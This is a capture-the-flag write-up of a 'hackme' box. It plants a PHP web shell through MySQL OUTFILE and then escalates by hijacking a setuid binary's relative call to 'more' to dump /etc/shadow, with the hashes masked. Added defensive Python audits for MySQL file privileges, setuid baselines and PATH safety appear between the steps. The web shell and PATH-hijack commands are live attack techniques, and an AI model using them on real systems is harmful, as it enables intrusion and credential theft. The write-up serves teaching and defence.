Encapsulating

Hackme challenge

There was once a box with 3306 and 80,
I decided that the configuration might be shaky,
Although I could brute the MySQL users,
My user/password combos were all losers,
I looked upon port 80 in wonder,
This is a hackme, there must be a blunder,
Although Dirbuster and Nikto proved fruitless,
Manual dir grinding was not completely useless,
/~mysql/ contained a backup file,
This hack had suddenly become worthwhile,
As I browsed the archive for a way in,
I saw a password in .bash_history, and it read, l3tm31n..

Now that I had root MySQL (and, rather conveniently, read/write access to the file system via LOAD_FILE and OUTFILE), I could start probing for public Apache directories that I could write to as www-data. I figured the /~mysql/ directory would be a good place to start, but where is it on the file system? This took me longer than it should have: I started looking in /home/mysql/, then in /etc/apache2/apache2.conf, and then guessed at a user-specific Apache configuration under /etc/apache2/conf.d, all without success. Although /home/mysql/ seemed likely (it even contained the test.html file that was also in the /~mysql/ web directory), it was not the directory I was looking for.
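The root MySQL account is dangerous here because nothing limits where LOAD_FILE() and SELECT ... INTO OUTFILE may read and write. The two server-side controls for that are the secure_file_priv option (an empty value means no restriction, NULL disables file operations entirely, a directory confines them) and not handing the FILE privilege, or ALL on *.*, to accounts that do not need it. The audit below is an added example, not code from the original post or from the challenge box; the my.cnf fragment and SHOW GRANTS lines it checks are constructed sample input.

```python
"""Audit MySQL settings and grants for unrestricted file access.

Added example: parses a my.cnf fragment and the text of SHOW GRANTS output
and reports the conditions that let an account touch arbitrary files
through LOAD_FILE() and SELECT ... INTO OUTFILE.
"""
import re

# Constructed sample inputs (not taken from the challenge box).
SAMPLE_MY_CNF = """
[mysqld]
datadir=/var/lib/mysql
secure_file_priv=
"""

SAMPLE_GRANTS = [
    "GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION",
    "GRANT SELECT, FILE ON *.* TO 'backup'@'%'",
    "GRANT SELECT ON app.* TO 'app'@'localhost'",
]

GRANT_PATTERN = re.compile(
    r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<scope>\S+)\s+TO\s+"
    r"(?P<acct>'[^']*'@'[^']*')",
    re.I,
)


def parse_secure_file_priv(my_cnf_text):
    """Return secure_file_priv from the [mysqld] section, or None if absent
    (the server default then applies and varies by MySQL version)."""
    section = None
    for raw in my_cnf_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section != "mysqld" or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        if key.replace("-", "_").lower() == "secure_file_priv":
            return value.strip("\"'")
    return None


def accounts_with_file_privilege(grant_lines):
    """Accounts holding FILE on *.*, directly or via ALL PRIVILEGES on *.*."""
    found = []
    for line in grant_lines:
        m = GRANT_PATTERN.match(line.strip())
        if not m:
            continue
        privs = {p.strip().upper() for p in m.group("privs").split(",")}
        if m.group("scope") == "*.*" and privs & {"FILE", "ALL", "ALL PRIVILEGES"}:
            found.append(m.group("acct"))
    return found


def audit(my_cnf_text, grant_lines):
    """Collect human-readable findings for the two file-access controls."""
    findings = []
    sfp = parse_secure_file_priv(my_cnf_text)
    if sfp is None:
        findings.append("secure_file_priv not set explicitly; confirm the server default")
    elif sfp == "":
        findings.append("secure_file_priv is empty: LOAD_FILE/OUTFILE can use any path the server process can")
    elif sfp.upper() != "NULL":
        findings.append("secure_file_priv confines file operations to %s" % sfp)
    for acct in accounts_with_file_privilege(grant_lines):
        findings.append("%s holds FILE (or ALL) on *.*" % acct)
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_MY_CNF, SAMPLE_GRANTS):
        print(finding)
```

On a live server the same inputs come from SHOW VARIABLES LIKE 'secure_file_priv' and SHOW GRANTS FOR each account; the check is about what the account can do, so a web application's own database user should never appear in the FILE list at all.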

Let’s look at that backup archive again, in particular, .bash_history:

mkdir public_html
ls -al
cd ..
tar cvzf mysql/public_html/backup.tgz mysql
cd mysql/
ls -la
cd public_html/

Fascinating, let’s apply some logic here. If:

mkdir public_html

is the first command the mysql user runs when they log in, then /home/mysql/public_html/ is (typically) where that directory will be created. Hey presto! PHP file created with MySQL OUTFILE:

<?php system($_GET['a']); ?>

Let’s find setuid binaries:

~mysql/yay1.php?a=find / -perm -4000 -ls

 32731   68 -rwsr-xr-x   1 root     root        64112 Apr 29  2008 /bin/mount
 32734   28 -rwsr-xr-x   1 root     root        27108 Nov 14  2009 /bin/su
 32749   32 -rwsr-xr-x   1 root     root        30788 Jul 27  2010 /bin/ping
 32730   44 -rwsr-xr-x   1 root     root        44088 Apr 29  2008 /bin/umount
295746    8 -rwsr-x--x   1 root     root         6629 Oct 27  2010 /bin/readmanifesto
 32750   28 -rwsr-xr-x   1 root     root        26616 Jul 27  2010 /bin/ping6
254809   40 -rwsr-sr-x   1 daemon   daemon      39864 Oct 20  2008 /usr/bin/at
255403   32 -rwsr-xr-x   1 root     root        32184 Nov 14  2009 /usr/bin/chfn
255407   32 -rwsr-xr-x   1 root     root        31704 Nov 14  2009 /usr/bin/passwd
255406   44 -rwsr-xr-x   1 root     root        41528 Nov 14  2009 /usr/bin/gpasswd
255404   28 -rwsr-xr-x   1 root     root        27736 Nov 14  2009 /usr/bin/chsh
258604   76 -rwsr-sr-x   1 root     mail        72544 Apr 30  2006 /usr/bin/procmail
255720   24 -rwsr-xr-x   1 root     root        22788 Nov 14  2009 /usr/bin/newgrp
279418  196 -rwsr-xr-x   1 root     root       192912 Jan 14  2009 /usr/lib/openssh/ssh-keysign
253975   12 -rwsr-xr-x   1 root     root         9620 Oct 21  2010 /usr/lib/pt_chown
271867    8 -rwsr-xr-x   1 root     root         4552 Oct  3  2008 /usr/lib/eject/dmcrypt-get-device
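An unfamiliar setuid-root binary in that list is exactly the kind of thing a defender's inventory should surface. The script below is an added example, not code from the original post; it parses the `find / -perm -4000 -ls` output format shown above (the listing embedded in it is the one from this post) and reports every entry that is missing from a baseline, is setgid as well as setuid, or is owned by someone other than root. The baseline set is constructed for the example; on a real system it would come from the distribution's package manifests.

```python
"""Review a `find / -perm -4000 -ls` listing against a known-good baseline.

Added example: parse the find -ls format and report setuid binaries that
need an explanation.
"""
from collections import namedtuple

SetuidEntry = namedtuple("SetuidEntry", "perms owner group size path")

# Listing from the post above, used as sample input.
SAMPLE_LISTING = """\
 32731   68 -rwsr-xr-x   1 root     root        64112 Apr 29  2008 /bin/mount
 32734   28 -rwsr-xr-x   1 root     root        27108 Nov 14  2009 /bin/su
 32749   32 -rwsr-xr-x   1 root     root        30788 Jul 27  2010 /bin/ping
 32730   44 -rwsr-xr-x   1 root     root        44088 Apr 29  2008 /bin/umount
295746    8 -rwsr-x--x   1 root     root         6629 Oct 27  2010 /bin/readmanifesto
 32750   28 -rwsr-xr-x   1 root     root        26616 Jul 27  2010 /bin/ping6
254809   40 -rwsr-sr-x   1 daemon   daemon      39864 Oct 20  2008 /usr/bin/at
255403   32 -rwsr-xr-x   1 root     root        32184 Nov 14  2009 /usr/bin/chfn
255407   32 -rwsr-xr-x   1 root     root        31704 Nov 14  2009 /usr/bin/passwd
255406   44 -rwsr-xr-x   1 root     root        41528 Nov 14  2009 /usr/bin/gpasswd
255404   28 -rwsr-xr-x   1 root     root        27736 Nov 14  2009 /usr/bin/chsh
258604   76 -rwsr-sr-x   1 root     mail        72544 Apr 30  2006 /usr/bin/procmail
255720   24 -rwsr-xr-x   1 root     root        22788 Nov 14  2009 /usr/bin/newgrp
279418  196 -rwsr-xr-x   1 root     root       192912 Jan 14  2009 /usr/lib/openssh/ssh-keysign
253975   12 -rwsr-xr-x   1 root     root         9620 Oct 21  2010 /usr/lib/pt_chown
271867    8 -rwsr-xr-x   1 root     root         4552 Oct  3  2008 /usr/lib/eject/dmcrypt-get-device
"""

# Constructed baseline (illustrative; a real one is derived from package manifests).
BASELINE = {
    "/bin/mount", "/bin/su", "/bin/ping", "/bin/umount", "/bin/ping6",
    "/usr/bin/at", "/usr/bin/chfn", "/usr/bin/passwd", "/usr/bin/gpasswd",
    "/usr/bin/chsh", "/usr/bin/procmail", "/usr/bin/newgrp",
    "/usr/lib/openssh/ssh-keysign", "/usr/lib/pt_chown",
    "/usr/lib/eject/dmcrypt-get-device",
}


def parse_find_ls(listing):
    """Parse find -ls lines: inode blocks perms links owner group size mon day year path."""
    entries = []
    for line in listing.splitlines():
        parts = line.split(None, 10)   # path is the 11th field and may contain spaces
        if len(parts) < 11:
            continue
        _inode, _blocks, perms, _links, owner, group, size, _m, _d, _y, path = parts
        entries.append(SetuidEntry(perms, owner, group, int(size), path))
    return entries


def review(entries, baseline=BASELINE):
    """Return (path, [reasons]) for each entry a reviewer should look at."""
    findings = []
    for e in entries:
        reasons = []
        if e.path not in baseline:
            reasons.append("not in baseline")
        if len(e.perms) == 10 and e.perms[6] == "s":   # group-exec slot carries setgid
            reasons.append("setuid and setgid")
        if e.owner != "root":
            reasons.append("setuid to %s, not root" % e.owner)
        if reasons:
            findings.append((e.path, reasons))
    return findings


if __name__ == "__main__":
    for path, reasons in review(parse_find_ls(SAMPLE_LISTING)):
        print("%s: %s" % (path, "; ".join(reasons)))
```

The at and procmail findings are expected on this kind of Debian-era box and would simply be annotated in the baseline; /bin/readmanifesto, absent from any package, is the one that warrants a look at what it runs.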

Wtf is … /bin/readmanifesto? Sounds interesting, let’s look:

::::::::::::::
/etc/manifesto.txt
::::::::::::::
The Hacker Manifesto

Another one got caught today, it's all over the papers. "Teenager Arrested in Computer Crime Scandal", "Hacker Arrested after Bank Tampering"...

Damn kids. They're all alike.

But did you, in your three-piece psychology and 1950's technobrain, ever take a look behind the eyes of the hacker? Did you ever wonder what made him tick, what forces shaped him, what may have molded him?

I am a hacker, enter my world...

Mine is a world that begins with school... I'm smarter than most of the other kids, this crap they teach us bores me...

Damn underachiever. They're all alike.

I'm in junior high or high school. I've listened to teachers explain for the fifteenth time how to reduce a fraction. I understand it. "No, Ms. Smith, I didn't show my work. I did it in my head..."

Damn kid. Probably copied it. They're all alike.

I made a discovery today. I found a computer. Wait a second, this is cool. It does what I want it to. If it makes a mistake, it's because I screwed it up. Not because it doesn't like me... Or feels threatened by me.. Or thinks I'm a smart ass.. Or doesn't like teaching and shouldn't be here...

Damn kid. All he does is play games. They're all alike.

And then it happened... a door opened to a world... rushing through the phone line like heroin through an addict's veins, an electronic pulse is sent out, a refuge from the day-to-day incompetencies is sought... a board is found. "This is it... this is where I belong..." I know everyone here... even if I've never met them, never talked to them, may never hear from them again... I know you all...

Damn kid. Tying up the phone line again. They're all alike...

You bet your ass we're all alike... we've been spoon-fed baby food at school when we hungered for steak... the bits of meat that you did let slip through were pre-chewed and tasteless. We've been dominated by sadists, or ignored by the apathetic. The few that had something to teach found us willing pupils, but those few are like drops of water in the desert. 

This is our world now... the world of the electron and the switch, the beauty of the baud. We make use of a service already existing without paying for what could be dirt-cheap if it wasn't run by profiteering gluttons, and you call us criminals. We explore... and you call us criminals. We seek after knowledge... and you call us criminals. We exist without skin color, without nationality, without religious bias... and you call us criminals. You build atomic bombs, you wage wars, you murder, cheat, and lie to us and try to make us believe it's for our own good, yet we're the criminals.

Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for.

I am a hacker, and this is my manifesto. You may stop this individual, but you can't stop us all... after all, we're all alike.

Something about h4x0r5, whatever. It looks like this will be our attack vector; let’s pull up the process list:

root      3713  0.0  0.1   1612   284 ?        S    11:17   0:00  |       |   \_ readmanifesto
root      3714  0.0  0.2   1996   548 ?        S    11:17   0:00  |       |       \_ more /etc/manifesto.txt

Holy sardines Batman! Relative binary calls? For fuck’s sake..

Let’s create a new file called ‘more’ in the /tmp directory, just for fun.

echo -e "#!/bin/bash\ncat /etc/shadow" > /tmp/more

Now let’s cat /tmp/more:

"#!/bin/bash
cat /etc/shadow"

Hmmm, let’s break out sed:

sed -i 's/"//g' /tmp/more
cat /tmp/more
#!/bin/bash
cat /etc/shadow

Now we need to update the $PATH variable so that the /tmp directory is searched first:

PATH=/tmp:$PATH; readmanifesto
root:$xxxxxxxxxxxxxxxxxxxxx:14908:0:99999:7:::
.....
administrator:$xxxxxxxxxxxxxxxxxxxxxxxxxxx/:14908:0:99999:7:::
.....
mysql:$xxxxxxxxxxxxxxxxxxxxxxxx/:14908:0:99999:7:::

Sexy.
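The root cause is that readmanifesto runs `more` by bare name, so the setuid process resolves it through whatever PATH the caller supplies. The code below is an added example, not code from the original post or from the challenge binary. It models the lookup execvp performs so the /tmp-first resolution can be seen without touching a real setuid program, audits a PATH value for entries that are world-writable, relative or empty, and shows the form a privileged helper should use instead: an absolute program path and a fixed, minimal environment. Directory and file modes come from a constructed in-memory snapshot so the example runs anywhere; on a real host os.stat supplies them.

```python
"""PATH resolution, PATH auditing, and the hardened alternative.

Added example: why a setuid program must not depend on the caller's PATH.
"""
import os
import stat

# Constructed filesystem snapshot: path -> (is_dir, mode, executable).
FS = {
    "/tmp": (True, 0o1777, False),       # sticky, world-writable
    "/bin": (True, 0o755, False),
    "/usr/bin": (True, 0o755, False),
    "/bin/more": (False, 0o755, True),
    "/tmp/more": (False, 0o755, True),   # the planted script from the post
}

SAFE_PATH = "/usr/sbin:/usr/bin:/sbin:/bin"


def resolve_command(name, path_value, fs=FS):
    """First PATH entry holding an executable `name`, as execvp would find it.
    A name containing '/' is used as given and PATH is ignored."""
    if "/" in name:
        return name
    for d in path_value.split(":"):
        candidate = os.path.join(d or ".", name)
        info = fs.get(candidate)
        if info is not None and not info[0] and info[2]:
            return candidate
    return None


def audit_path(path_value, fs=FS):
    """(entry, problem) pairs for PATH entries an unprivileged user controls."""
    issues = []
    for d in path_value.split(":"):
        if d == "" or not d.startswith("/"):
            issues.append((d, "relative or empty entry resolves against the cwd"))
            continue
        info = fs.get(d)
        if info is None:
            issues.append((d, "does not exist"))
        elif info[1] & stat.S_IWOTH:
            issues.append((d, "world-writable"))
    return issues


def hardened_command(program, args):
    """argv and environment a privileged helper should hand to execve or
    subprocess.run: absolute program path, PATH pinned to system directories."""
    if not os.path.isabs(program):
        raise ValueError("program must be an absolute path, got %r" % program)
    return [program, *args], {"PATH": SAFE_PATH}


if __name__ == "__main__":
    for p in ("/usr/bin:/bin", "/tmp:/usr/bin:/bin"):
        print("PATH=%-20s more -> %s  issues=%s" % (p, resolve_command("more", p), audit_path(p)))
    print(hardened_command("/bin/more", ["/etc/manifesto.txt"]))
```

The same defensive shape applies whether the helper is written in C (execve with an explicit envp rather than system() or execvp) or in a scripting language (subprocess.run with env= set explicitly); the point is that the privileged side, not the caller, decides which binary runs.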
